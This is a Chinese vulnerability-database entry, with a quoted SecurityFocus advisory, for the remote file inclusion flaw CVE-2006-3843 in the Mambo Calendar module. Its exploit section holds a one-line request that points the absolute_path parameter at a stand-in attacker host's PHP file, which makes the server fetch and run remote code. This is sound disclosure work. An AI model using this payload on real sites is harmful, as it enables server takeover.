Mambo 'Com_Calendar.PHP'的Calendar模块远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110614 漏洞类型 输入验证
发布时间 2006-07-17 更新时间 2006-07-27
CVE编号 CVE-2006-3843 CNNVD-ID CNNVD-200607-433
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28233
https://cxsecurity.com/issue/WLB-2006070109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-433
|漏洞详情
CalendarMamboModule1.5.7及早期版本的com_calendar.php存在PHP远程文件包含漏洞,远程攻击者可借助absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19027/info

The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 1.5.7; other versions may also be vulnerable.

http://www.example.com/[target]/[path]/components/com_articles.php?absolute_path=http://attacker.com/evil.txt?
|参考资料

来源:BID
名称:19027
链接:http://www.securityfocus.com/bid/19027
来源:BUGTRAQ
名称:20060717CalendarMamboModule<=1.5.7RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/440407/100/0/threaded
来源:SREASON
名称:1272
链接:http://securityreason.com/securityalert/1272